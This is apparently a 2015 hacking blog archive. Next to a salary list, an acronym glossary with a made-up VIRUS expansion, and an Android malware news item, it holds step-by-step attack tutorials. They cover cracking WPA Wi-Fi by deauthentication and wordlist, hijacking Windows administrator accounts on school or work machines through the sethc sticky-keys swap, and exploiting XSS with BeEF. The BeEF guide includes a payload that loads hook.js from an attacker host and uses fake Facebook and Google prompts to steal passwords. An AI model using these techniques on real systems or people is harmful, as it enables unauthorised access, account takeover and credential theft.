Showing posts with label trick. Show all posts
Showing posts with label trick. Show all posts

Friday, 27 February 2015

HIGHEST PAYING PROGRAMMING LANGUAGES YOU SHOULD LEARN

Most of us know's about C, C++, JAVA and Python etc., but as you go more deeper into this field, you will realize the value and amount of money that can be earned with some other languages.
The favorite coding language debate is one of the hottest and interesting topics of discussion among the coders and programmer has his/her own reasons to defend a particular language. Last year the average salary of a computer programmer inched towards an all-time high of $100,000.
These are the most hiighest paying languages.Coz at the end of the day it's all about big money.
12. PERL - $82,513
11. SQL - $85,511
10. Visual Basic - $85,962
9. C# - $89,074
8. R - $90,055
7. C - $90,134
6. JavaScript – $91,461
5. C++ - $93,502
4. JAVA - $94,908
3. Python - $100,717
2. Objective C - $108,225
1, RUBY ON RAIL - 116,196

Tuesday, 24 February 2015

LEARN HOW TO HACK WIFI IN MOST EASY WAY

In this tutorial, I’m going to tell you how to hack wifi.Now, given that we have Kail Linux, open up a terminal window, type in “ifconfig “. This is going to list all the networking interfaces connected to your device.
Selection_001
Here, we need (wlan0) which is our wifi card.So we will disable others by typing ifconfig("name of interface")down.
Selection_002
now we will type "airmon-ng start wlan0"
Selection_003
(airmon-ng is a tool for monitoring air traffic, “start” basically starts the tool, and “wlan0” specifies the interface we are using for monitoring)
It’ll probably show “some processes that could cause trouble”, we’ll simply kill those processes by typing  “kill <process ID>”.
Selection_004
Now if we type "ifconfig" it will only show the monitoring mode "mon0"
Selection_005
Then,type, “airodump-ng mon0”.
In the screenshot below, the highlighted bssid is our target (and it is my own), the channel is 13 as we can see under in “CH” column.
Selection_006
In  next step we will type “airodump-ng –c <channel> -w <name> –bssid <bssid> mon0”.
Selection_007
Let me tell you few things here, “airodump-ng” is a tool for capturing Wi-Fi packets, “<channel>” means the channel your target is running on, “-w” basically writes a file by the name that succeeds it in “<name>”, (I did “handshake” just for the convenience of it) bssid is a string of numbers specific to a hotspot.
Selection_008
Than, open up a new terminal and type “aireply-ng -0 0 –a <bssid> mon0”, this command send a deauthentication signal (usually called a deauth packet) to all the devices connected to that hotspot. Then after few moments stop it by “Ctrl+C”. Now, as we can see, the other terminal shows that the WPA Handshake was successfully captured.
Selection_009
We will close both windows at this point, and open a new one. Type “ls”; that should list the files in the current directory. We can clearly see that the files from the above operation are present. But we only need the file ending with “-01.cap”.
Selection_010
Then open a new terminal type, “aircrack-ng –w <full location of the wordlist> <the file name>”.remember it the file will be ending with .cap.
Selection_011
You may be asking what wordlist? What is that sh*t?
A Wordlist is a file containing thousands of known and possible passwords, which you can download from the internet. The one I used can be found here. The list contains 982,963,904 words exactly all optimized for WPA/WPA2. Would also just like to point out that this is not my work, I got it from forums.hak5.org. It was a guy who compiled a whole load of useful lists, including his own to come up with 2 lists (one is 11gb and one is 2gb) I will be seeding this torrent indefinitely since it is shareware and it's awesome!
Selection_012
It will then start  matching keys in the word list. Now the time it will take completely depend's on the strength of the password. The stronger the password the more time will it take.
After completion it looks something like the screenshot below. In it, you can see that it tested 45688 keys and my key was the 45689th.
Selection_013
Now you can use this passowrd on that wifi network and enjoy.This tutorial is completely for educational purpose.For further tricks.tips and news from world of technology and hacking stay tuned to  hackaklash.blogspot.com

Saturday, 21 February 2015

COMPUTER BEGINNERS TERMINOLOGIES

Communication terminilogies:
– VHF – Very High Frequency.
– UHF – Ultra High Frequency.
– GPRS – General Packet Radio Service.-
– WAP – Wireless Application Protocol.
-TCP – Transmission Control Protocol .
– ARPANET – Advanced Research Project Agency Network.
-IBM – International Business Machines.
– HP – Hewlett Packard.
-AM/FM – Amplitude/ Frequency Modulation.
– WLAN – Wireless Local Area Network.



Computer system terms:
– SIM – Subscriber Identity Module.
– AVI = Audio Video Interleave
– RTS = Real Time Streaming
– SIS = Symbian OS Installer File
-AMR = Adaptive Multi-Rate Codec
– JAD = Java Application Descriptor
– JAR = Java Archive
– JAD = Java Application Descriptor
– 3GPP = 3rd Generation Partnership Project
-3GP = 3rd Generation Project
-MP3 = MPEG player lll
– MP4 = MPEG-4 video file
-AAC = Advanced Audio Coding
– GIF = Graphic Interchangeable Format
– JPEG = Joint Photographic Expert Group
– BMP = Bitmap
– SWF = Shock Wave Flash
– WMV = Windows Media Video
– WMA = Windows Media Audio
– WAV = Waveform Audio
– PNG = Portable Network Graphics
– DOC = Document (Microsoft Corporation)
-PDF = Portable Document Format
– M3G = Mobile 3D Graphics
– M4A = MPEG-4 Audio File
– NTH = Nokia Theme (series 40)
– THM = Themes (Sony Ericsson)
– MMF = Synthetic Music Mobile Application File
– NRT = Nokia Ringtone
– XMF = Extensible Music File
-WBMP = Wireless Bitmap Image
– DVX = DivX Video
– HTML = Hyper Text Markup Language
– WML = Wireless Markup Language
– CD – Compact Disk.
-DVD – Digital Versatile Disk.
-CRT – Cathode Ray Tube.
-DAT – Digital Audio Tape.
-DOS – Disk Operating System.
-GUI – Graphical User Interface.
-HTTP – Hyper Text Transfer Protocol.
-IP – Internet Protocol.
-ISP – Internet Service Provider.
-TCP – Transmission Control Protocol.
– UPS – Uninterruptible Power Supply.
– HSDPA – High Speed Downlink Packet Access.
-EDGE – Enhanced Data Rate for GSM [Global System for Mobile
-HTTP – Hyper Text Transfer Protocol.
-HTTPS – Hyper Text Transfer Protocol Secure.
-IP – Internet Protocol.



-URL – Uniform Resource Locator.
-USB – Universal Serial Bus.
– VIRUS – Vital Information Resource Under Seized.
– 3G – 3rd Generation.
– GSM – Global System for Mobile Communication.
– CDMA – Code Division Multiple Access.
-UMTS – Universal Mobile Telecommunication

Friday, 20 February 2015

NEW MALWARE IN ANDROID PHONE REMAINS OFF EVEN AFTER POWER OFF

Security experts have found new issue in android phones.This issue is not a small bug but a malware.Experts have found new malware named "POWEROFFHIJACK".This malware has unique feature.It hijacks the entire process of powering off your android phone.

          After pressing power off button you will see whole shutdown animation but reality will be something else because your phone will not shutdown actually it will be black screen .Which will create illusion similar to the screen of phone which had been shut down.You are being spied in whole scenario.According to experts this malware infects android version less than 5(lollipop).

          POWEROFHIJACK malware has effected more than ten thousand phones majority from china.This malware has ability tosend text messages,make calls,take photos,record videos and perform other tasks.

NOTE:The only way to protect yourself is to remove battery after switching off your phone.

Saturday, 14 February 2015

HOW TO BREAK IN ANY ADMINISTRATOR ACCOUNT ON ANY WONDOWS SYSTEM

Have you forgotten your windows password and you are locked out.So don't worry we will 

be helping you to successfuly log in to your administrator account.


Once you get to this screen hold power button until it turns off.


If you would had done it correctly,you will get such tyoe of screen .If not then try again or 

select launch startup  repair.


Let the repair process continue if you get such type of window then click 'cancel'


when you will get this window click on "show problems",scroll down and click the last 
link.notepad wiill popup.



Then go to file/open and double click on the disk in which you have your windows installed.


Now go to windows/system32 Now do exactyl what I say, or you might damage the computer. Under “Files of type,” select “All files.” Scroll down and find “cmd,” then make a copy of "cmd"  in the same folder in which "cmd" is located. You will get a file named “cmd – Copy” or something like that.

 Now find “sethc” in the same folder. This file executes sticky keys. Rename it to “sethc1".

Now rename your “cmd – Copy” to “sethc.” Close notepad, and hit “Finish” to shut down your system, or just restart it manually.



Once you get back to the login screen (where it says “Press Control – Alt – Delete.” Ignore my background, I don’t have that enabled), press “Shift” 5 times to open up the command prompt.
Next, we need to find out who is the user of local administrator for this PC. To do this, type “net localgroup Administrators” and look for any administrator that does not have your school/work domain in front of it, followed by a “/.” As you can see, one of the admins is named “qwaszx.” You will probably see a name like this, since schools/workspaces tend to make it a random string of letters and/or numbers to  avoid  people from entering it.

Now, we need to change that account’s password. Type “net user <ACCOUNT NAME HERE> *” and type the new password twice. It will not show what you’re typing, but your keystrokes are being registered. You can now log in to your admin account. However, schools/workspaces also like to disable the admin account you just changed the password for, so you might not be able to log in. There is a simple fix. If you get that message,then do extra step.

If the admin account is disabled, type “net user <ACCOUNT NAME HERE> /active:yes” You will now be able to log in



Now enjoy you have full rights to use it
WARNING:we will not be held responsible for any misuse.It is purely for educational purpose











Thursday, 12 February 2015

HACKING SOCIAL MEDIA SITES USING BEEF

The best tool I’ve seen to be used with different XSS attacks is called the BeEF Exploitation
Framework.f you do find a valid XSS on a site, you will need to craft your XSS findings to utilize the BeEF Framework.
 Starting BeEF Commands:

1.cd/usr/share/beef-xss./beef



Let’s log into the console UI after the BeEF server has started. As we see from the image above, the
UI URL in this case is located at http://127.0.0.1:3000/ui/authentication. We can open a browser and
go to that URL.



 If we look at the image where we loaded BeEF via command line, we saw both a URL
for the UI page and the hook page (Hook URL). Let’s take a quick second and review the hook page
(hook.js).



Although this JavaScript has been well obfuscated, this is the payload that will control the victim user
and will be injected into the victim browser ’s page. Once injected, their browser will connect back
into your central server and the victim will be unaware.

So if we have located an XSS vulnerability on a page, we can now use BeEF to help with the
exploitation of the end user. In our initial example, http://securepla.net/xss_example/example.php?
alert=, the alert variable takes any input and presents it to the end user. We can manually add our
JavaScript code here and send the link to our unsuspecting user. In the example below, I print out the
user’s DOM cookies using the JavaScript code:

<script>alert(document.cookie)</script>



This proves that the end user does process the JavaScript code embedded from our query. To create a
successful exploit, instead of printing the cookies, we are going to craft a URL that uses JavaScript to
include the hook.js file. It will look something like: http://securepla.net/xss_example/example.php?
alert=asda<script src=http://192.168.10.91:3000/hook.js></script>. I was able to append the hook.js
script by using the JavaScript code:

<script src=[URL with hook.js]></script>
Remember that if this is done on a public site then the URL will need to be pointing to a public
address hosting the hook.js page and listening service.

Once you trick a victim to go to that URL using Social Engineering Tactics , they will be part of your
XSS zombie network. Going back to our UI panel, we should now see a victim has joined our server.




With an account hooked, there are many different modules within BeEF to exploit the end user. As
from the image above, you can try to steal stored credentials, get host IP information, scan hosts
within their network, and so much more.


One of my favorite attacks is called “petty theft” because of how simple it is. Drop down to Social
Engineering folder and to Petty Theft. Configure how you want it, in this case we’ll use the Facebook
example, and hit execute. Remember the IP for the custom logo field has to be your BeEF IP. This is
so the victim can grab the image from your server.




After the attacker clicks submit, on the victim’s system a Facebook password prompt will pop up.
This is where you can get creative in targeting your users and use a popup that they would most likely
enter. If you are looking to gain Google accounts, there is also a Google Phishing module. The
purpose of this client side attack is that they are unaware that they are part of this zombie network and
the password prompt should seem like it is not out of the ordinary.



After the unsuspecting victim types in their password, go back to the UI to find your loot. Clicking on
the id 0 will show the attacker what the victim typed into that box. This should be enough to start
gaining some access as the user and move laterally throughout the environment.



I hope I was able to demonstrate how powerful an XSS vulnerability can be.









METHOD TO SHUTDOWN WINDOWS 7

Step by step how to Shutdown Windows 7 Remotely:

1. Open up our command prompt (RUN and type cmd) and type shutdown /? to view the help file and knowing available switch.

C:\>shutdown /?
Usage: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e] [/f]
    [/m \\computer][/t xxx][/d [p|u:]xx:yy [/c “comment”]]

    No args    Display help. This is the same as typing /?.
    /?         Display help. This is the same as not typing any options.
    /i         Display the graphical user interface (GUI).
               This must be the first option.
    /l         Log off. This cannot be used with /m or /d options.
    /s         Shutdown the computer.
    /r         Shutdown and restart the computer.
    /g         Shutdown and restart the computer. After the system is
               rebooted, restart any registered applications.
    /a         Abort a system shutdown.
               This can only be used during the time-out period.
    /p         Turn off the local computer with no time-out or warning.
               Can be used with /d and /f options.
    /h         Hibernate the local computer.
               Can be used with the /f option.
    /e         Document the reason for an unexpected shutdown of a computer.
    /m \\computer Specify the target computer.
    /t xxx     Set the time-out period before shutdown to xxx seconds.
               The valid range is 0-315360000 (10 years), with a default of 30.
               If the timeout period is greater than 0, the /f parameter is
               implied.
    /c "comment" Comment on the reason for the restart or shutdown.
               Maximum of 512 characters allowed.
    /f         Force running applications to close without forewarning users.
               The /f parameter is implied when a value greater than 0 is
               specified for the /t parameter.
    /d [p|u:]xx:yy  Provide the reason for the restart or shutdown.
               p indicates that the restart or shutdown is planned.
               u indicates that the reason is user defined.
               If neither p nor u is specified the restart or shutdown is
               unplanned.
               xx is the major reason number (positive integer less than 256).
               yy is the minor reason number (positive integer less than 65536).

2. To shutdown the remote computer we need to run the command:

shutdown /s /f /m \\VishnuValentino

But when we execute that code, we will receive the code: message Access is Denied.(5)
3. This is because we haven't authenticated our computer to use the resources on the remote computer. To fix this error and authenticate our computer, we must enter the remote computer's credentials:

NET USE \\<computer_name> <password> /USER:<user_name>

Here is the screenshot when I execute the command:

remote_shutdown2

I put the double quotes around the username because it contained a space.

4. Now we have authenticated ourselves to the remote computer and can run the shutdown command. We can run the shutdown command from Step 2 or add another control switch. When we execute the shutdown command again, this is the result on the remote computer: